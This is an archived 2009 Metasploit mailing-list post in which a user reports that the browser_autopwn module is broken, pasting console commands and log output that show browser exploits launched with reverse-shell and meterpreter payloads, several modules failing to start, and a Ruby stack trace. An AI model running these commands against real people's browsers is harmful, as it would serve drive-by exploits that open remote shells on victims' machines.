Metasploit mailing list archives

browser_autopwn broken


From: donnahawthorneonline at googlemail.com (Donna Hawthorne)
Date: Sun, 9 Aug 2009 13:32:33 +0200

Running latest from subversion(changeset 6944), cygwin bundled(Ruby
1.9.1) Windows XP SP3

==============
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > exploit
[-] Auxiliary failed: Msf::OptionValidateError The following options
failed to validate: LHOST.
msf auxiliary(browser_autopwn) > set lhost 192.168.2.122
lhost => 192.168.2.122
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module running as background job
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.2.122...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload
generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/W5ILKcfokRVq
[*]  Local IP: http://192.168.2.121:8080/W5ILKcfokRVq
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload
generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/p0MrY4DboYl1CO
[*]  Local IP: http://192.168.2.121:8080/p0MrY4DboYl1CO
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload
generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/piP9Qeqhd
[*]  Local IP: http://192.168.2.121:8080/piP9Qeqhd
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload
generic/shell_reverse_tcp
[-] Exploit failed: invalid value for Integer: " "
[-] Failed to start exploit module multi/browser/opera_configoverwrite
[*] Starting exploit multi/browser/opera_historysearch with payload
generic/shell_reverse_tcp
[-] Exploit failed: invalid value for Integer: " "
[-] Failed to start exploit module multi/browser/opera_historysearch
[*] Starting exploit osx/browser/safari_metadata_archive with payload
generic/shell_reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/mam7caoLJN
[*]  Local IP: http://192.168.2.121:8080/mam7caoLJN
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload
windows/meterpreter/reverse_tcp
[-] Exploit failed: invalid value for Integer: ">"
[-] Failed to start exploit module windows/browser/apple_quicktime_rtsp
[*] Starting exploit windows/browser/ie_createobject with payload
windows/meterpreter/reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/MoL3SfX
[*]  Local IP: http://192.168.2.121:8080/MoL3SfX
[*] Server started.
[*] Starting exploit windows/browser/ie_xml_corruption with payload
windows/meterpreter/reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/rltd9vvx5O7czZ2
[*]  Local IP: http://192.168.2.121:8080/rltd9vvx5O7czZ2
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with
payload windows/meterpreter/reverse_tcp
[-] Exploit failed: invalid value for Integer: "\xE2"
[-] Failed to start exploit module windows/browser/ms03_020_ie_objecttype
[*] Starting exploit windows/browser/ms06_067_keyframe with payload
windows/meterpreter/reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/aIoMr4cd8MUmD
[*]  Local IP: http://192.168.2.121:8080/aIoMr4cd8MUmD
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload
windows/meterpreter/reverse_tcp
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/yqpauRa5D
[*]  Local IP: http://192.168.2.121:8080/yqpauRa5D
[*] Server started.

[*] --- Done, found 8 exploit modules

[*] Using URL: http://0.0.0.0:8080/MV1f7ANTV9OI
[*]  Local IP: http://192.168.2.121:8080/MV1f7ANTV9OI
[*] Server started.

[*] Using URL: http://0.0.0.0:8080/MV1f7ANTV9OI
[*]  Local IP: http://192.168.2.121:8080/MV1f7ANTV9OI
[*] Server started.
[*] Request '/MV1f7ANTV9OI' from 192.168.2.121:1925
[*] Request '/MV1f7ANTV9OI?sessid=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6ZW4tVVM6eDg2OlNhZmFyaTp1bmRlZmluZWQ6'
from 192.168.2.121:1925
[*] JavaScript Report: undefined:undefined:undefined:en-US:x86:Safari:undefined:
[*] No database, using targetcache instead
[*] Responding with exploits
Error: No such file or directory - /home/user/OcJS3zcw.zip
(eval):116:in `initialize'
(eval):116:in `new'
(eval):116:in `generate_zip'
(eval):83:in `on_request_uri'
/msf3/lib/msf/core/exploit/http.rb:343:in `block in start_service'
/msf3/lib/rex/proto/http/handler/proc.rb:37:in `call'
/msf3/lib/rex/proto/http/handler/proc.rb:37:in `on_request'
/msf3/lib/rex/proto/http/server.rb:340:in `dispatch_request'
/msf3/lib/rex/proto/http/server.rb:279:in `on_client_data'
/msf3/lib/rex/proto/http/server.rb:142:in `block in start'
/msf3/lib/rex/io/stream_server.rb:45:in `call'
/msf3/lib/rex/io/stream_server.rb:45:in `on_client_data'
/msf3/lib/rex/io/stream_server.rb:183:in `block in monitor_clients'
/msf3/lib/rex/io/stream_server.rb:181:in `each'
/msf3/lib/rex/io/stream_server.rb:181:in `monitor_clients'
/msf3/lib/rex/io/stream_server.rb:68:in `block in start'


==================================

As you can see, a couple exploits fail to start


Current thread: